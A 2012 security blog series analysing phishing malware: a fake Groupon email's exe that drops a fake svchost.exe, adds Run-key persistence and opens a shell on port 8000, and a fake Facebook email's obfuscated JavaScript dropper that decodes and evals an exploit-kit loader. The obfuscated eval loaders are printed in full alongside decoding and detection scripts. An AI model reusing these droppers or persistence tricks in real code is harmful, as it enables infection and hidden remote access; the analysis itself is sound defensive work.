Irregular Expressions


July 28, 2012  12:24 AM

Discount Gift Certificates – Part 4

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

I did a dump of the exe, and the good news is that I don’t see any sign of a packer. The bad news is that I don’t see any sign of its ability to phone home. I was really hoping that this would be easy and a DNS name or IP would be found in the exe.

Next thing is to run through it in a debugger and see if there is anything else of note.

July 27, 2012  12:21 AM

Discount Gift Certificates – Part 3


Still no sign of outbound connections, and I am not sure if I will ever see one at this point.
My next step is to do some static analysis of the code and see if there are any hints in there.

I did have a thought, the suspect file came attached to an HTML email?
That could be an effective way to see who possibly loaded the exe: if you linked to a file on a web server from inside the html you could see it hit in the logs. Then scan those IPs at a later date.

After much searching, all of the links in the file are going to groupon.com.
I was starting to get disappointed when I noticed some extras on some of the links…

There are division, user and source. This might be something to work with, but I doubt it will get anything more than an email to groupon to ask about it.
Each of the links appears to have a different user string attached like so.

user=3DDYS6OKLRAMKYYLDPUVAYRXSE3NMMNR3ETX39NA6LFNF8G
user=3DOBPAXTL39667KKV9YNBX7U6K00
user=3DXKHPO5YGT7OX9O42NUL1YK1CB9E

But the source and division seem to be consistent.
utm_source=3Dwelcome_day0&amp=;utm_medium=3Demail
division=3Dmiami

If what I am thinking is correct the attacker is using groupon to manage the campaign, by using its methods of tracking. I am assuming that whatever they can see through the analytics allows them to see the IP of the source.

I will send an email to them, see if we get anywhere.

Also we can continue with the static analysis.


July 26, 2012  11:24 PM

Discount Gift Certificates – Part 2


Still no outbound connections that I have seen so far, but I did a bit of looking around and it does create a listener.

Listening on port 8000 TCP.

Connecting to it with netcat gives you a command shell.

That’s good to know, what I really want to know is how they are going to connect to that and know where it is.


July 26, 2012  10:59 PM

Discount Gift Certificates


Wow really I can’t wait to get those.

I got a fake groupon email today with a zip attachment that had an exe inside.

First thing was to get it copied on to my VM system ( and hope it does not do something silly while running in a VM ).
Then get a few of my favorite utils fired up. For this I am going to just start with CaptureBAT and see what happens then go from there.

We are off to a good start, it did run. It went off as a running process of the same name. Here are some other things it did:
- Dropped a file to “Documents and Settings\All Users\svchost.exe”
- Created a persistent method of launching, HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SunJavaUpdateSched: “C:\Documents and Settings\All Users\svchost.exe”

What I have not seen yet is it making a network connection out.
Yet anyway.
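An added check, not from the post, that a defender can run in a PowerShell console to surface this kind of persistence: it lists the Run and RunOnce values and flags any command that launches an svchost.exe from somewhere other than the Windows system directories, which is exactly the shape of the SunJavaUpdateSched entry above.

```powershell
# Added check, not part of the post: list Run/RunOnce entries and flag any
# whose command points at an svchost.exe outside the Windows system
# directories, the shape of the persistence described above
# (SunJavaUpdateSched -> C:\Documents and Settings\All Users\svchost.exe).
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
)
$systemDirs = @("$env:SystemRoot\System32", "$env:SystemRoot\SysWOW64")

foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($p in $props.PSObject.Properties) {
        # skip the PSPath/PSParentPath/... members PowerShell adds to the object
        if ($p.Name -like 'PS*') { continue }
        $cmd = [string]$p.Value
        $suspicious = $false
        if ($cmd -match '(?i)svchost\.exe') {
            # the real svchost.exe is only ever launched from the system directories
            $inSystemDir = $systemDirs | Where-Object { $cmd -like "*$_*" }
            if (-not $inSystemDir) { $suspicious = $true }
        }
        [pscustomobject]@{
            Key        = $key
            Name       = $p.Name
            Command    = $cmd
            Suspicious = $suspicious
        }
    }
}
```

Pipe the output to `Where-Object Suspicious` to see only the flagged entries; a hit for the dropped file above would show under the Name SunJavaUpdateSched.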


July 25, 2012  7:26 PM

Side Quest — Part 4


I am still working on getting the shellcode out so I can play with it, but in the meantime I hashed the file.

https://www.virustotal.com/file/51d0586cd16f1339674610b5e2d0eec810f647a40731ae551ad426699f333866/analysis/

We are on the right track, I might have to back burner this one for a bit.


July 24, 2012  7:35 PM

Side Quest — Part 4


The js we got from the last part has a lot of functions that appear to be checking versions of various software, but there is a bit of gravy at the end.


function getShellCode() {
if (1) {
return "shellcode";
}
}

I truncated the shellcode, next we need to get that out of there and figure out what it does.
I am not sure at this point if this is a link to more js or shellcode itself, either way it will be fun.


July 21, 2012  1:28 AM

Side Quest — Part 3


If you are following at home you should have a comma delimited dataset from that last part of the script we ran.

It should be around 110k so it is much bigger than the last two.

This will be a little more complicated than the last few steps as well; here is the first for loop.


z=function(){if(window.document)e="ev";c="";if(x)f="fromChar";
d=10;
m=Math;
for(i=32606-1;i>=0;i--){
w=i;
v=a[w];
dd=(32606-i-2+1);
b=d;
dd=dd-b*m["floo"+"r"](dd/d);
k=v*1+(dd-3);
if(x&&e)c=c+String.fromCharCode(k);
}
e+="a";
md=["a"];
window[e+"l"](c);}

At the end there was a second, this one was much less complicated.

a=[];
for(i=0;i<g.length;i+=2){
a.push(parseInt(g.substr(i,2),16));
}
z(123);

For me, running this through rhino produced errors, and I fixed a few and then it made some more. I quickly abandoned it and created my own. Instead of re-writing the whole thing, I got the second for loop to run with no changes (it’s the second for loop but it’s run first). The second loop filled the variable “a”, which is not really useful to me at this point. You can either use a debugger or do what I did and add a statement to eval the contents of “a” (we pointed eval to print when we started).

The output from this is a huge decimal comma delimited file.

Now we need to solve the second for loop. Below is my version of the for loop, but in perl. Just get the contents of “a” into the @data array.


use POSIX qw(floor);   # floor() is not a Perl builtin

# @data holds the comma delimited dump of "a" (one line); the values are
# walked backwards exactly like the js loop above
foreach (@data) {
    chomp($_);
    @a = split(',',$_);

    for ($i=32606-1;$i>=0;$i--) {

        $v = $a[$i];
        $dd = (32606-$i-2+1);
        $d=10;
        $b=$d;
        $dd=$dd-$b*floor($dd/$d);   # dd mod 10
        $k = $v*1+($dd-3);

        $string = chr($k);
        print "$string";
    }

}

This should give you yet more js.


July 21, 2012  1:14 AM

Side Quest — Part 2


The best way to decode the contents of “n” is to let the script do it for us.

The script already has everything we need to do it, so running something like rhino on the command line should give you everything you need.  Be sure to read the man pages and documentation before you go into this one; it will also help to have a basic understanding of the script itself.

After running this through we get more js back; part of it is an iframe that is loaded and it links to another site.

hxxp://xxxxxxxxx.xx.xx/main.php?page=xxxxxxx

After downloading this page, we get a big surprise..

More js.

Here is the summary.


// opening lines of z() were lost in extraction; restored from the copy shown in Part 3
z=function(){if(window.document)e="ev";c="";if(x)f="fromChar";
d=10;
m=Math;
for(i=32606-1;i>=0;i--){
w=i;
v=a[w];
dd=(32606-i-2+1);
b=d;
dd=dd-b*m["floo"+"r"](dd/d);
k=v*1+(dd-3);
if(x&&e)c=c+String.fromCharCode(k);
}
e+="a";
md=["a"];
window[e+"l"](c);}
try{5<=prototype;}catch(v){x=1;}

g="39……";

a=[];
for(i=0;i<g.length;i+=2){
a.push(parseInt(g.substr(i,2),16));
}
z(123);

Just a little more complicated than the last one, but not much.  Pointing this straight at rhino generated errors so I broke it into two sets.

The first is populating “a”; instead of pushing the output of the last for loop to a you can print it to the screen and redirect to a file.
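As an added example that is neither the blog’s nor the malware’s own code, and serving both this post and Part 3 above, here is the z() routine rewritten as a pure JavaScript function: it does the hex-to-byte step and the backwards offset pass as plain string building, so the hidden script comes back as text instead of being handed to eval or Rhino. The loop bound is taken from the array length rather than the hardcoded 32606, and the sample input is a constructed harmless string, not the real g.

```javascript
// Added example (not the blog's own code): decode the two-stage obfuscation
// from Side Quest Parts 2 and 3 without executing anything.
// Stage one turns the hex string g into a byte array a; stage two walks a
// backwards, adding ((n - i - 1) mod 10) - 3 to each byte.

function hexToBytes(g) {
  const a = [];
  for (let i = 0; i < g.length; i += 2) {
    a.push(parseInt(g.substr(i, 2), 16));
  }
  return a;
}

function decodeStage2(a) {
  const n = a.length;                  // original hardcodes 32606
  const d = 10;
  let c = "";
  for (let i = n - 1; i >= 0; i--) {
    let dd = n - i - 2 + 1;            // same arithmetic as the sample
    dd = dd - d * Math.floor(dd / d);  // dd mod 10
    const k = a[i] * 1 + (dd - 3);
    c += String.fromCharCode(k);
  }
  return c;
}

// Inverse of the transform, used only to build a constructed sample input.
// Output position j is taken from a[n-1-j], where (n-i-1) mod 10 == j mod 10.
function encodeStage2(text) {
  const n = text.length;
  const a = new Array(n);
  for (let j = 0; j < n; j++) {
    a[n - 1 - j] = text.charCodeAt(j) - (j % 10) + 3;
  }
  return a.map(v => v.toString(16).padStart(2, "0")).join("");
}

// Constructed sample: a harmless payload standing in for the real g.
const SAMPLE_PLAINTEXT = 'document.write("decoded stage");';
const SAMPLE_G = encodeStage2(SAMPLE_PLAINTEXT);

function decodeHex(g) {
  return decodeStage2(hexToBytes(g));
}
```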



July 20, 2012  12:43 AM

Side tracked…


I got a funny email today that I started digging into, so I thought I would share as I have been working on little else since.

It came in as a notice from facebook that someone has posted a picture of me..

Yay! That’s so exciting; it was caught by the spam filter so it means it must be a really good picture..

There were a few links embedded in the email but they all went to the same place.

Here is what it was trying to execute.

<script>
try{prototype>0;
} catch(zxc){e=window["eva"+"l"];
n="89..1125..81..21".split("..");
h=2;
s="";
for(i=0;-623+i<0;i=1+i){
k=i;
s=s+String.fromCharCode(n[k]/(i%(h)+9));
}
if(012===10)e(s);
}</script>

Pardon the terrible parsing job I did and the var n has been cut way down to keep it simple.

The basics of what is going on here is that there is something hidden in n (duh) and the surrounding code gets it out and executes it.  The key functions we need to know here are split and fromCharCode.

Split does exactly what it sounds like: it will split the text on a given separator, in this case “..”, so it produces the pieces free of them.  These are just added as an attempt to hinder analysis and detection.

fromCharCode will convert a Unicode code value into the corresponding character.

Part 2 is going to show what tools to use to get something out of this with minimal effort.
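As an added example, not code from the post, the same unpacking done as a plain function that never calls eval: it splits on “..”, divides each element by (i % h + 9) and rejects any element that does not divide evenly, which is the sanity check you want before trusting the output. Since the post’s n is cut down, the sample array here is constructed with the inverse transform.

```javascript
// Added example (not the blog's own code): decode the "n" array from the
// fake Facebook notice without executing it. The sample splits n on "..",
// then rebuilds each character as n[i] / (i % h + 9) with h = 2, so the
// divisor alternates 9, 10, 9, 10, ... The original loop bound (623) is the
// payload length; here it comes from the array itself.

function decodeStage1(encoded, h = 2) {
  const n = encoded.split("..");
  let s = "";
  for (let i = 0; i < n.length; i++) {
    const divisor = (i % h) + 9;
    const code = Number(n[i]) / divisor;
    // A non-integer means the divisor scheme is wrong for this element;
    // flag it instead of silently emitting a mangled character.
    if (!Number.isInteger(code)) {
      throw new Error(`element ${i} (${n[i]}) is not divisible by ${divisor}`);
    }
    s += String.fromCharCode(code);
  }
  return s;
}

// Inverse transform, used only to build the constructed sample below.
function encodeStage1(text, h = 2) {
  const parts = [];
  for (let i = 0; i < text.length; i++) {
    parts.push(text.charCodeAt(i) * ((i % h) + 9));
  }
  return parts.join("..");
}

// Constructed sample standing in for the post's truncated "89..1125..81..21".
const SAMPLE_N = encodeStage1('var x = "hidden";');

function decodedSample() {
  return decodeStage1(SAMPLE_N);
}
```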


July 17, 2012  10:30 PM

The Return Of Zeus


I am finally ready to continue my analysis of the zeus sample I have.  I am just getting a couple of machines ready to continue.

From this point in I want to continue the behavioral analysis with Capture-BAT on the client and some other honeynet projects on a Linux machine to emulate services.

Capture-BAT can be found here: https://www.honeynet.org/node/315

For Linux I will be using REMnux, which you can get here: http://sourceforge.net/projects/remnux/files/version3/remnux-3.0-vm-public.rar/download

I will be using REMnux to emulate and capture all of the network traffic.  Just got to get this all setup again.

